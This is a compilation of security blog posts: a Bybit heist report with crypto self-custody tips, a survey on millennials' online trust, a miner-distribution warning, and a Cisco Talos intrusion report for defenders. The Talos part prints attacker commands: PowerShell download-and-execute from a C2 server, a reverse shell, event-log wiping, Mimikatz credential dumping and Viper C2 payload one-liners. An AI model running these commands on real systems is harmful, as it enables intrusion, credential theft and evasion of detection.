February 21 was a dark day for the crypto market as it suffered the largest heist in its history. Attackers made off with around $1.5 billion from Bybit, the world’s second-largest crypto exchange, with experts citing it as the biggest theft – of anything – of all time. Although neither this loss nor the withdrawal of a further $5 billion by panicked investors were fatal for Bybit, the incident underscores the fundamental flaws in the modern crypto ecosystem, and serves up some valuable lessons for regular users.

How Bybit was robbed

Like all major crypto exchanges, Bybit secures stored cryptocurrency with multi-layered protection. Most funds are stored in cold wallets disconnected from online systems. When current assets need topping up, the required sum is manually moved from the cold wallet to the hot one, and the operation is signed by several employees at once. For this, Bybit uses a multi-signature (multisig) solution from Safe{Wallet}, and each employee involved in the transaction signs it using a private Ledger hardware cryptokey.

The attackers studied the system in detail and, according to independent researchers, compromised a Safe{Wallet} developer machine. Presumably, malicious modifications were made to the code for displaying Safe{Wallet} web application pages. But the logic bomb inside it was triggered only if the transaction source matched the Bybit contract address — otherwise Safe{Wallet} worked as usual. Having conducted their own investigation, the owners of Safe{Wallet} rejected the findings of the two independent information security companies, insisting that their infrastructure had not been hacked.

So what happened? During a routine top-up of $7 million to a hot wallet, Bybit employees saw on their computer screens this exact amount and the recipient’s address, which matched the hot wallet address. But other data got sent for signing instead! For regular transfers, the recipient’s address can (and should!) be checked on the screen of the Ledger device. But when signing multisig transactions, this information isn’t displayed — so Bybit employees essentially made a blind transfer.

As a result, they inadvertently green-lighted a malicious smart contract that moved the entire contents of one of Bybit’s cold wallets to several hundred fake wallets. As soon as the withdrawal from the Bybit wallet was complete, it appears that the code on the Safe{Wallet} website reverted to the harmless version. The attackers are currently busy “layering” the stolen Ethereum — transferring it piecemeal in an attempt to launder it.

By the looks of it, Bybit and its clients were the victims of a targeted supply-chain attack.

The Bybit case is no one-off

The FBI has officially named a North Korean group codenamed TraderTraitor as the perpetrator. In information-security circles, this group is also known as Lazarus, APT38, or BlueNoroff. Its trademark style is persistent, sophisticated and sustained attacks in the cryptocurrency sphere: hacking wallet developers, robbing crypto exchanges, stealing from ordinary users, and even making fake play-to-earn games.

Before the Bybit raid, the group’s record was the theft of $540 million from the Ronin Networks blockchain, created for the game Axie Infinity. In that 2022 attack, hackers infected the computer of one of the game’s developers using a fake job offer in an infected PDF file. This social engineering technique remains in the group’s arsenal to this day.

In May 2024, the group pulled off a smash-and-grab of over $300 million from Japanese crypto-exchange DMM Bitcoin, which went bankrupt as a consequence. Before that, in 2020, more than $275 million was siphoned off the KuCoin crypto exchange, with a “leaked private key” for a hot wallet cited as the reason.

Lazarus has been honing its cryptocurrency theft tactics for over a decade now. In 2018, we wrote about a string of attacks on banks and crypto exchanges using a Trojanized cryptocurrency trading app as part of Operation AppleJeus. Experts at Elliptic estimate that North-Korea-linked actors’ total criminal earnings amount to around $6 billion.

What crypto investors should do

In the case of Bybit, clients were lucky: the exchange promptly serviced the wave of withdrawal requests that ensued, and promised to compensate losses from its own funds. Bybit remains in business, so clients don’t need to take any particular action.

But the hack demonstrates once again just how hard it is to secure funds flowing through blockchain systems, and how little can be done to cancel a transaction or refund money. Given the unprecedented scale of the attack, many have called for the Ethereum blockchain to be rolled back to its pre-hack state, but Ethereum developers consider this “technically intractable”. Meanwhile, Bybit has announced a bounty program for crypto exchanges and ethical researchers to the tune of 10% of any funds recovered, but so far only $43 million has materialized.

This has caused some crypto industry experts to speculate that the main fallout from the hack will be a rise in self-custody of crypto assets.

Self-custody shifts the responsibility for secure storage from the shoulders of specialists to your own. Therefore, only go down this route if you have total confidence in your abilities to master all security measures and follow them rigidly day by day. Note that regular users without cryptowallet millions are unlikely to face a sophisticated attack targeted specifically at them, while generic mass attacks are easier to deflect.

So, what do you need for secure self-custody of cryptocurrency?

• Buy a hardware wallet with a screen. This is the most effective way to protect crypto assets. Do a little research first, and be sure to buy a wallet from a reputable vendor — and directly: never second-hand or from a marketplace. Otherwise, you might get a pre-hacked wallet that swallows up all your funds. When using a wallet to sign transfers, always check the recipient’s address on both the computer screen and the wallet screen to rule out its substitution by a malicious smart contract or a clipper Trojan that replaces cryptowallet addresses in the clipboard.
• Never store wallet seed phrases in electronic form. Forget about using files on your computer and photos in your gallery for that — modern Trojans have learned to infiltrate Google Play and the App Store and recognize data in photos stored on your smartphone. Only paper records (or metal engravings, if you prefer) kept inside a safe or in another physically secure place, protected from both unauthorized access and natural disasters, will do. You might consider multiple storage locations, as well as splitting your seed phrase into parts.
• Don’t keep all your eggs coins in one basket. For holders of large amounts or different types of crypto assets, it makes sense to use multiple wallets. Small amounts for transactional needs can be stored on a crypto exchange, while the bulk can be divided among several hardware cryptowallets.
• Use a dedicated computer. If possible, dedicate a computer for cryptocurrency transactions. Physically restrict access to it (e.g., put it in a safe, a locked cupboard or locked room), use disk encryption and password login, and have a separate account with its own passwords (i.e., different to those on your main computer). Install reliable protection and enable maximum security settings on your “crypto-computer”. Connect it to the internet only for transactions, and use it solely for operations with wallets. Playing games, reading crypto news, and chatting with friends are for another device.
• If dedicating a computer is impractical or uneconomical, maintain strict digital hygiene on your main computer. Set up a separate account with low privileges (non-administrator) for crypto operations, and another account — also non-administrator — for work, chat and games. There’s no need to work in administrator mode at all, except to update the system software or significantly reconfigure the computer. Sign in to your dedicated “crypto account” only for operations with wallets, and sign out immediately afterward. Don’t give outsiders access to the computer, and don’t share admin passwords with anyone.
• Take care when choosing cryptowallet software. Carefully study the software’s description, make sure that the application has been on the market for a long time, and check that you’re downloading it from the official website, and that the digital signature of the distribution corresponds to the website and the name of the vendor. Perform a deep scan of your computer with an up-to-date security solution before installing and running cryptowallet software.
• Be careful with updates. While we usually recommend updating all software right away, in the case of cryptocurrency applications, it’s worth adjusting this policy a little. After the release of a new version, wait about a week and read the reviews before installing it. This will give the community time to catch any bugs or Trojans that may have sneaked into the update.
• Follow the enhanced computer security measures described in our post Protecting crypto investments: four key steps to safety, which include installing a powerful security solution, such as Kaspersky Premium, on your computer and smartphone, regularly updating your operating system and browsers, and using strong, unique passwords.
• Expect phishing. Cryptocurrency fraud can be both multifaceted and sophisticated, so any unexpected messages by email, messenger app and the like should be seen as the start of a scam. Keep on top of all the latest crypto scams by following our blog or Telegram channel, as well as other reputable cybersecurity sources.

Read more about crypto scams and ways to protect yourself in our dedicated posts:

• Eight of the most daring crypto thefts in history
• The top-5 biggest cryptocurrency heists ever
• Case study: fake hardware cryptowallet
• Pig butchering: large-scale cryptocurrency fraud
• and other articles about cryptocurrency.

Kaspersky official blog – ​Read More

Millennials have grown up alongside the rise of social media and digital communication – and in many ways appear to be the most tech-savvy generation. However, our latest research reveals a concerning reality: 70 percent of millennials rarely verify the authenticity of the people they engage with online, leaving them vulnerable to cyberrisks such as identity fraud, misinformation, and emotional deception.

As digital friendships and online communities become increasingly central to daily life, many millennials need rethink their approach to online trust (actually, so do other generations, of course, but today we concentrate on the “millennial paradox”). The desire for connection and validation is driving significant behavioral shifts – from prioritizing social-media interactions over real-world relationships, to oversharing personal information in digital spaces. These trends expose users to heightened cybersecurity threats – making digital literacy and caution more important than ever.

The trust paradox: digital natives, yet still vulnerable to deception

Despite being the first generation to embrace the internet fully, many millennials place misplaced trust in their online interactions. While 64 percent have encountered someone misrepresenting their identity, nearly half still trust information shared within their digital communities. This contradiction highlights a gap between perceived digital expertise and actual cybersecurity awareness.

Cyber-psychologist Ruth Guest warns that this overconfidence can lead to risky behavior. “When we trust our own digital savvy implicitly, we may overlook the possibility that others are not as genuine as they appear. In some cases, individuals with strong narcissistic, psychopathic or Machiavellian traits exploit this trust through catfishing and other deceptive tactics.”

Rethinking digital trust means applying a level of skepticism that matches real-world caution. A strong cybersecurity mindset requires more than technical skills – it demands critical thinking and vigilance.

From social validation to privacy risks

Social media has become the go-to space for millennials to share major life updates – often before informing close friends or family. Our research shows that nearly half of millennials post significant personal news online before discussing it in person with anyone. The instant feedback from likes, comments, and shares can create a sense of validation – but it also comes with risks.

Forty-five percent of millennials are comfortable sharing personal or sensitive information online – a behavior that can increase their exposure to phishing scams, identity theft, and doxing. Cybercriminals use publicly available information to craft targeted attacks – exploiting personal details such as location check-ins, workplace updates, and relationship status.

According to Marc Rivero, Lead Security Researcher at Kaspersky, “Oversharing personal information online can make individuals more vulnerable to identity theft, phishing attacks, and social engineering scams. Personal details shared online, such as location check-ins, relationship status, and daily routines, can be exploited for targeted scams or unauthorized surveillance.”

To mitigate these risks, it’s important to reconsider what’s shared, strengthen privacy settings, and remain cautious about how digital footprints are being used.

Digital friendships: a balance between connection and risk

As loneliness rises among young adults (among other generations), online friendships have become an essential part of social life. Our study found that 29 percent of millennials report that digital friendships positively impact their mental health. Online communities provide a sense of belonging, and allow users to connect with like-minded individuals across the world.

However, not all online interactions are positive. Ten percent of millennials report negative experiences from digital interaction. Even more concerning, 14 percent admit to creating fake profiles or using false identities themselves. These statistics highlight the prevalence of digital deception and the challenges of distinguishing between genuine and fabricated relationships.

Back to cyber-psychologist Ruth Guest, she emphasizes the importance of balance. “Digital spaces have evolved into safe and creative havens where millennials can explore, learn and connect with like-minded individuals. When used wisely and with proper safeguards, social media can be a tremendous asset to one’s mental health. It offers a platform for self-expression, a sense of belonging, and even creative inspiration. However, it is crucial to remember that the benefits of these online communities depend on maintaining a balance.”

How millennials can strengthen their digital defenses

As key players in the digital world, millennials need to take proactive steps to protect their online presence and encourage stronger cybersecurity habits in those around them. Implementing essential security measures can help reduce exposure to online threats and foster safer digital habits.

1. Verify identities

• Use reverse-image searches, and cross-check profiles before engaging with new contacts.

2. Cross-check information

• Always verify facts from multiple sources before sharing or acting on them.
• Follow Kaspersky Daily for insights on emerging cyberthreats.

3. Protect personal information

• Adjust social-media privacy settings, and use our online privacy checker to enhance security.
• Be mindful of real-time location sharing to avoid tracking risks.

4. Respect others’ privacy

• Obtain consent before sharing others’ personal details.

5. Stay educated regarding online scams

• Recognize signs of phishing, fake profiles, and social-engineering scams.

6. Use strong passwords and security tools

• Use Kaspersky Password Manager to generate and store unique passwords securely.
• Never reuse passwords across multiple platforms.

7. Keep devices updated and secure

• Regularly update apps, software, and antivirus programs to prevent vulnerabilities being exploited.
• Use Kaspersky Premium for real-time protection against identity theft, malicious links, and cyberthreats.

To access the full research report, visit the link.

Kaspersky official blog – ​Read More

• Cisco Talos discovered malicious activities conducted by an unknown attacker since as early as January 2025, predominantly targeting organizations in Japan.  
• The attacker has exploited the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines.  
• The attacker utilizes plugins of the publicly available Cobalt Strike kit “TaoWu” for-post exploitation activities. 
• Talos found a pre-configured installer script on the command and control (C2) server that deploys a full suite of adversarial tools and frameworks hosted on an Alibaba cloud container Registry, highlighting the potential misuse of such tools for malicious purposes by the attacker. 
• Talos noticed the attacker’s attempt at stealing the victim’s machine credentials. However, we assess with moderate confidence that the attacker’s motive extends beyond just credential harvesting, based on our observation of other post-exploitation activities, such as establishing persistence, elevating to SYSTEM level privilege, and potential access to adversarial frameworks, indicating the likelihood of future attacks. 
• We reported an increasing trend of threat actors exploiting vulnerable public facing applications for initial access in our quarterly Talos Incident Response (Talos IR) report for Q4 2024, and the discovery of this intrusion highlights this ongoing activity.  

Victimology  

We found that the attacker predominantly targets organizations in Japan across various business verticals, including technology, telecommunications, entertainment, education, and e-commerce, based on our analysis of command and control (C2) server artefacts.  

Attack overview  

The attacker attempts to compromise the victim machine using an exploit program targeting the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows. In the event of successful exploitation, the attacker executes PowerShell script to run Cobalt Strike reverse HTTP shellcode, ensuring remote access to the victim machine.  

Then, they begin reconnaissance by gathering system details and user privileges. They execute privilege escalation exploit programs, such as JuicyPotato, RottenPotato, and SweetPotato, to gain SYSTEM-level access. They establish persistence by modifying registry keys, adding scheduled tasks, and creating malicious services using the plugins of the Cobalt Strike kit called “TaoWu.”  

To maintain stealth, they erase event logs using wevtutil commands, removing traces of their actions from the Windows security, system, and application logs. They further perform network reconnaissance using “fscan.exe” and “Seatbelt.exe” to map out potential lateral movement targets. The attacker has also attempted to abuse Group Policy Objects using “SharpGPOAbuse.exe” to execute malicious PowerShell scripts across the network. Eventually, they execute Mimikatz commands to dump and exfiltrate passwords and NTLM hashes from memory on the victim’s machine.  

Initial access 

Talos discovered that the attacker gains initial access to the victim’s network by exploiting the vulnerability CVE-2024-4577.  

CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in Windows-based PHP installations using CGI configurations. It arises from the “Best-Fit” behavior in Windows code pages, where certain characters are replaced in command-line inputs. The flaw in the PHP-CGI module misinterprets these characters as PHP options, allowing attackers to execute arbitrary PHP code on the server when using Apache with a vulnerable PHP-CGI setup.  

To target the vulnerability, the attacker leverages a publicly available exploit Python script “PHP-CGI_CVE-2024-4577_RCE.py”. The script checks to see if a specific URL is vulnerable to the CVE-2024-4577 vulnerability. It does this by sending a specifically crafted POST request to a target URL with PHP code designed to trigger the vulnerability. If the response contains the MD5 hash “e10adc3949ba59abbe56e057f20f883e”, it indicates a successful exploitation. Then, the exploit script prompts the user to input commands as PHP code that are executed on the vulnerable servers and gets the response displayed to the attacker.  

In this intrusion, we found that the attacker has executed an embedded PowerShell command in the PHP code to trigger the infection.  

<?php system ('powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http[://]38[.]14[.]255[.]23[:]8000/payload[.]ps1')"');?>

The attacker triggers the infection by executing the PowerShell command through the PHP code, leading to the download and execution of a PowerShell injector script from the C2 server on the victim machine memory.  

The PowerShell injector script is embedded with either base64-encoded or a hexadecimal data blob of the Cobalt Strike reverse http shellcode. Upon execution, it injects and executes the Cobalt Strike reverse HTTP shellcode on the victim machine’s memory and connects to the Cobalt Strike server running on the C2 server over HTTP, enabling remote access to the victim machine.  

The shellcode connects to the C2 server 38[.]14[.]255[.]23 through HTTP using the port 8077 and the URL paths “/6Qeq” or “/jANd”. The attacker has used one of the two HTTP header’s user agents.  

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)

Post-exploitation activities 

After gaining remote access to the victim machine through Cobalt Strike reverse HTTP shellcode, the attacker remotely executes commands on the victim machine from the Cobalt Strike server that is configured with plugins from the “TaoWu” Cobalt Strike kit (hxxps[://]github[.]com/pandasec888/taowu-cobalt_strike) to perform the post-exploitation tasks. 

Below are the post-exploitation commands that we observed in this attack that relate to the MITRE ATT&CK framework. 

Reconnaissance  

ATT&CK Technique: System Owner/User Discovery (T1033) 

The attacker gathers the victim’s system and user information and also checks the time synchronization by remotely executing the following commands on the victim machine.  

whoami  /all 
dir 
net time 

Privilege escalation

ATT&CK Technique: Exploitation for Privilege Escalation (T1068) 

The attacker attempts to elevate the user privileges by executing privilege escalation exploits, including JuicyPotato, RottenPotato, and SweetPotato. These Potato exploits abuse the Windows method of handling authentication and impersonation tokens to escalate privileges from a low-privileged user to SYSTEM user.   

Microsoft has already patched the flaws that these exploits target in Windows 10 and Windows Server 2012, 2016, and 2019, as well as in the latest versions. However, if a Windows process has “SeImpersonatePrivilege” permission enabled that allows a process to impersonate another user’s security token, it could still be abused for privilege escalation using JuicyPotato, SweetPotato, and RottenPotato.  

The attacker uses Ladon[.]exe, a plugin of the “TaoWu” Cobalt Strike kit, to bypass the user access controls in the victim machine.  

Ladon.exe BypassUac C:WindowsTemp123.exe 

Persistence 

ATT&CK Technique: Modify Registry (T1112) 

ATT&CK Technique: Scheduled task/job (T1053)  

ATT&CK Technique: Create or Modify System Process (T1543)  

The attacker leverages the “reg add” command and other .NET plugins of the TaoWu Cobalt Strike kit to modify the registry keys and create the Windows scheduled tasks to establish persistence on the victim machine. 

The attacker executes the “reg add” command to add the path of the beacon executable to the Run registry key. 

reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v Svchost /t REG_SZ /d "C:Windowssystem32cmd.exe" /f C:WindowsTemppayload.exe 

The attacker runs “sharpTask.exe”, a .NET program used to schedule a task on the Windows machine. 

sharpTask.exe --AddTask Computer|local|hostname|ip 24h:time|12:30  some Service "Some Service" C:WindowsTemppayload.exe 

They run “SharpHide.exe”, the utility used to create a hidden registry key.  

SharpHide.exe action=create keyvalue="C:WindowsTemp123.exe" 

They also run “SharpStay.exe”, a .NET tool used to create a service in the Windows machine.  

SharpStay.exe action=CreateService servicename=Debug command="C:Windowstmppayload.exe" 

Detection evasion

ATT&CK Technique: Indicator Removal on Host: Clear Windows Event Logs (T1070.001) 

The attacker erases evidence of their activity on the victim machine by clearing the Windows event logs on the compromised endpoint using the living-off-the-land binary (LoLBin) “wevtutil.exe”.  

wevtutil cl security 
wevtutil cl system 
wevtutil cl application 
wevtutil cl windows powershell 

Lateral movement  

ATT&CK Technique: Lateral Tool Transfer (T1570) 

The attacker uses fscan.exe, an open-source network scanning utility, and Seatbelt, a tool used to collect detailed information about a system—such as remote access configurations, network shares, and other security-relevant data on victim machine —to perform network reconnaissance and lateral movement in the victim network.  

The attacker uploads the utility “fscan.exe” from the C2 server to the “C:WindowsTemp” directory on the victim machine. 

upload /"C2 server path"/fscan.exe 

The attacker runs the .NET program “Seatbelt.exe” to gather the remote access-related information of the victim machine. 

Seatbelt.exe -group=Remote -full 

The attacker runs “SharpGPOAbuse.exe”, a tool used to abuse group policy objects (GPOs) for malicious purposes. The attacker creates a scheduled task via GPO named “update” that runs a PowerShell command across the network, which downloads and executes the attacker’s PowerShell payload. 

SharpGPOAbuse.exe --AddComputerTask --TaskName "update" --Author DOMAINAdmin --Command "cmd.exe" --Arguements "/c powershell.exe -nop -w hidden -c "IEX ((new-object new.webclient).downloadstring('http[://]38[.]14[.]255[.]23[:]8000/payload.ps1'))"" --GPOName "Default Server Policy" 

The attacker runs “fscan” to scan the local subnet of the victim’s network with a range of 256 IP addresses to discover other machines, ports, and services in the sub-network.  

fscan.exe -h 192[.]168[.]1[.]1/24 

The attacker locates SSH services that accept a public key, automating SSH brute-forcing by providing the public key (id_rsa.pub) to gain unauthorized access to SSH-enabled machines. They also attempt to brute-force SSH credentials for services running on a non-default port (2222). 

fscan.exe -h 192[.]168[.]1[.]1/24 -rf id_rsa.pub 
fscan.exe -h 192[.]168[.]1[.]1/24 -m ssh -p 2222 

Using the fscan utility, the attacker opens a reverse shell, enabling the attacker to execute commands on victim machines in the subnet while connecting back to their server on port 6666, and executes the “whoami” command on the accessible machines. 

fscan.exe -h 192[.]168[.]1[.]1/24 -rs 192.168.1.1:6666 
fscan.exe -h 192[.]168[.]1[.]1/24 -c whoami 

Credential access and exfiltration  

ATT&CK Technique: OS Credential Dumping (T1003) 

ATT&CK Technique: OS Credential Dumping: LSASS Memory (T1003.001) 

ATT&CK Technique: Exfiltration Over C2 Channel (T1041) 

The attacker executes Mimikatz commands to gather plaintext passwords and NTLM hashes from memory on the victim’s machine. 

sekurlsa::logonpasswords 

Attacker’s tradecraft has similarities with a hacker group 

We observed the attacker exploiting the weakness in the vulnerable systems to gain initial access and execute Cobalt Strike reverse HTTP beacons to have continued remote access to the victim machine. They have used the Cobalt Strike kit “TaoWu” that has several plugins, including sharpTask.exe, SharpHide.exe, SharpStay.exe, Ladon.exe, and fscan, and Mimikatz  for post-exploitation activities.  

Similar techniques were previously observed being used by the hacker group called “Dark Cloud Shield” or “You Dun” in their attacks in 2024, as reported by the DFIR Report.  

However, we are not attributing the attacks to the “You Dun” group, as we did not observe any further activities after harvesting the victim machine credentials in the current intrusion. 

Potential abuse of adversarial tools and frameworks 

We discovered that the attacker has used two C2 servers with IP addresses 38[.]14[.]255[.]23 and 118[.]31[.]18[.]77 hosted on Alibaba cloud running the Cobalt Strike team server. During our research period, we noticed that the attacker has left the directory listings and access of the root folder to the internet in the C2 server 38[.]14[.]255[.]23, according to our OSINT research artefacts.  

We found PowerShell scripts, Cobalt Strike beacon executables, and exploit programs along with the attacker’s command execution history logs in the C2 server’s exposed folder. Our further analysis of the contents of the exposed folder showed that the attacker had downloaded and executed a pre-configured installer shellscript called  “LinuxEnvConfig.sh” from the repository “yijingsec” on Gitee platform (hxxps[://]gitee[.]com/yijingsec/), a Chinese Git-based platform like GitHub. The author had described that the repository belongs to a network security talent training service provider called “Yijing Network Security Academy,” which indicates that the attacker is likely abusing the legitimate resource for malicious intention. 

The shell script “LinuxEnvConfig.sh” appeared to be designed to configure foundational environments for Ubuntu, Debian, and Kali Linux systems and facilitates the setup of various publicly available offensive security frameworks and tools, including Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus that are packaged and staged  as docker containers in the docker container registry called “registry[.]cn-shanghai[.]aliyuncs[.]com”, an Alibaba cloud container Registry (ACR) located in the Shangai, China, region.   

We also found that the shellscript, when executed by a user, modifies the machine’s DNS settings, pointing to a specific DNS server with the IP address 114[.]114[.]114[.]114, which is a Chinese 114DNS service and is not used very often in other regions. 

We have continued to see various threat actors abusing publicly available tools, such as Cobalt Strike, Metasploit, ARL, Vulfocus, and PowerShell Empire for their malicious intentions. Still, we found that some of the tools and frameworks, such as Blue-Lotus, BeEF, and Viper C2, that the shell script “LinuxEnvConfig” deploys, were not seen very often being held in the possession of an attacker, and we have documented them further in the blog post to provide an overview of the capabilities and functionalities that an attacker could leverage by abusing such tools.  

Blue-Lotus 

Blue-Louts is a JavaScript webshell cross-site scripting attack framework. Blue-Lotus is docker-based and was developed by Firesun[.]me and the Blue Lotus team, a cybersecurity technology competition and research team from Tsinghua University. 

Blue-Louts’ administrative panel is in Chinese with an XSS receiving dashboard that displays the connection details of the victim machine, including the IP address and browser. 

Blue-Lotus has the payload generation panel where the user can generate the JavaScript webshell payload using the default JavaScript template from the tool’s database. An attacker using the framework can generate the webshell  and instrument them in their attacks to perform following tasks: 

• Cross-site scripting (XSS). 
• Screen capture of remote machine.  
• Get the reverse shell access to the remote machine.  
• Steal the browser cookies. 
• Creation of user ID and passwords in the Content Management System (CMS).  

BeEF

BeEF is a publicly available browser exploitation framework that an attacker can hook to one or more web browsers in the victim machine and execute commands within the browser context. BeEF has command modules that consist of JavaScript codes to perform the following tasks: 

• Check if the links, forms, and URI paths of the web page in a hooked browser are vulnerable to XSS. 
• Submit arbitrary requests on behalf of the hooked browser. 
• Interact with the host on the local network of the hooked browser. 
• Send commands to the victim systems through Web Real-Time Communication (WebRTC) caller.  

Viper C2 

The Viper C2 is a modular framework with multiple plugins and scripts that define its extensive functionalities. The C2 has built-in integration with the (MSF) meterpreter console and scripts.  

Viper C2 has functionalities, such as: 

• Antivirus software bypass.  
• Intranet tunnel. 
• File management of the remote machine, such as upload and execute other executable files. 
• Remote command execution on compromised host. 
• Generate payloads of Meterpreter reverse shell in multiple forms that work on Windows, Linux, and MacOS. 
• Display the network topology of the compromised network. 

Viper C2 has the capability of generating the payload of Meterpreter HTTP and TCP reverse shell for multiple platforms, including Windows, Linux, MacOS, Android, Java, and Python. The payloads can be generated in different formats, such as EXE, DLL, ELF, ELF-SO, MSBuild, Macho, PowerShell script, PowerShell command, Python script, and HTA and VBA scripts.  

Viper C2 payload generation panel. 

Generated payloads are delivered to victims using the Viper C2 web delivery commands that the user can generate, including the delivery URL and instrument in their attacks.  

We compiled some of the command formats generated from Viper C2 that assists defenders and threat hunters for hunting threats related to Viper C2, shown below: 

Windows: 

regsvr32 /s /n /u /i:hxxp[://]C2 server:port/SWLonxen.sct scrobj.dll 

Linux: 

wget -qO lYoSQUgn --no-check-certificate hxxp[://]C2 server:port/oegqPVin; chmod +x lYoSQUgn; ./lYoSQUgn& disown 

PHP: 

php -d allow_url_fopen=true -r "eval(file_get_contents(' :/bIBNfnlE', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false] ])));" 

Python: 

python -c "import sys;import ssl;u=import('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlope n',));r=u.urlopen(' :/wXAOAUIK', context=ssl._create_unverified_context());exec(r.read());" 

PowerShell: 

[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
 
$pbFU=new-object net.webclient; 
if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null)
{$pbFU.proxy=[Net.WebRequest]::GetSystemWebProxy(); 
$pbFU.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;}; 
IEX ((new-objectNet.WebClient).DownloadString(‘C2 server:port/WyeslpUl/KaptrNuHdqhM’)); 
IEX ((new-objectNet.WebClient).DownloadString(‘C2 server:port’); 

Linux download and execute: 

wget -O 1737698200.elf --no-check-certificate hxxps[://]C2 server:port 
/api/v1/d/?en=/6trTQMIGpJgIMksMielQg%3D%3D && chmod 755 
1737698200.elf && ./1737698200.elf 

Coverage 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort SIDs for this threat: 

Snort 2: 64632, 64633, 64630, 64631. 

Snort 3: 301157, 301156. 

Indicators of Compromise 

IOCs for this threat can be found in our GitHub repository here. 

Cisco Talos Blog – ​Read More

Over the past six months, Windows Packet Divert drivers for intercepting and modifying network traffic on Windows systems have become popular in Russia. From August to January 2024, we noted that detections of these drivers almost doubled. The main reason? These drivers are being used in tools designed to bypass restrictions for accessing foreign resources.

This surge in popularity hasn’t gone unnoticed by cybercriminals. They’re actively distributing malware disguised as bypassing tools — and they’re doing it by blackmailing bloggers. So, every time you watch a video titled something like “How to bypass restrictions…”, be especially cautious — even the most reputable content creators might unknowingly be spreading stealers, miners, and other malware.

How cybercriminals exploit unsuspected users — and where bloggers fit into the picture — is what we’ll explore in this article.

Hackers disguised as honest developers

There are plenty of software solutions designed to bypass restricted access to foreign platforms, but they all have one thing in common — they’re created by small-time developers. Such programs spread organically: an enthusiast writes some code, shares it with friends, makes a video about it, and voilà — yesterday’s unknown programmer becomes a “people’s hero”. His GitHub repository is starred tens of thousands of times, and people thank him for restoring access to their favorite online resources. We recently wrote about one such case where cybercriminals boosted GitHub repositories containing malware.

There may be dozens or even hundreds of such enthusiasts — but who are they, and can they be trusted? These are key questions both current and potential users of these programs should be asking. A major red flag is when these developers recommend disabling antivirus protection. Disabling protection to voluntarily give a potential hacker access to your device? That’s a risky move.

Of course, behind the mask of a people’s hero might be a hacker looking for profit. An unprotected device is vulnerable to malware families like NJRat, XWorm, Phemedrone, and DCRat, which have been commonly spread alongside such bypassing software.

Where do bloggers fit in?

We’ve identified an active miner distribution campaign that has claimed at least two thousand victims in Russia. One of the infection sources was a YouTube channel with 60,000 subscribers. The blogger uploaded several videos on bypassing restrictions, with a link to a malicious archive in the description. These videos accumulated over 400,000 views in total. Later, the channel owner deleted the link, leaving this note: “Download the file here: (program does not work)”. Originally, the link led to the fraudulent site gitrok[.]com, where the infected archive was hosted. According to the site’s counter, at the time of our study the bypassing tool had been downloaded at least 40,000 times.

Don’t rush to put all the blame on the bloggers — in this case, they were simply following the orders of cybercriminals, unaware of what was really going on. Here’s how it works. First, the criminals file a complaint against a video about such a restriction-bypassing tool, pretending to be the software’s developers. Then they contact the video creator and persuade them to upload a new video, this time containing a link to their malicious website — claiming that this is now the only official download page. Of course, the bloggers have no idea the site is distributing malware — specifically, an archive containing a miner. And for those who’ve already uploaded three or more videos on the topic, refusal is not an option. The hackers threaten to file multiple complaints, and if there are three or more, the channel would be deleted.

In addition, the criminals spread their malware and installation guides through other Telegram and YouTube channels. Most of these have been deleted — but there’s nothing to stop them from creating new ones.

What about the miner?

The malware in question was a sample of SilentCryptoMiner, which we covered in October 2024. It’s a stealthy miner based on XMRig, another open-source mining tool. SilentCryptoMiner supports mining of multiple popular cryptocurrencies, including ETH, ETC, XMR, RTM, and others. The malware stops mining upon detecting certain processes, the list of which the criminals can provide remotely to evade detection. That makes it nearly impossible to detect without reliable protection.

For more about the malicious archive and how it persists in the system, check our post on Securelist.

How to protect yourself from miners

• Ensure that all personal devices have trusted protection to safeguard against miners and other malware.
• Avoid downloading programs from obscure or little-known sources. Stick to official platforms, but remember — malware can creep into them too.
• Keep in mind that even the most reputable bloggers can unknowingly spread malware, including miners and stealers.

Here are some relevant articles you can read to learn more about miners and their dangers:

Mario Forever, malware too: a free game with a miner and Trojans inside

XMRig Miner as a New Year’s gift

Prices down, miners up

Kaspersky official blog – ​Read More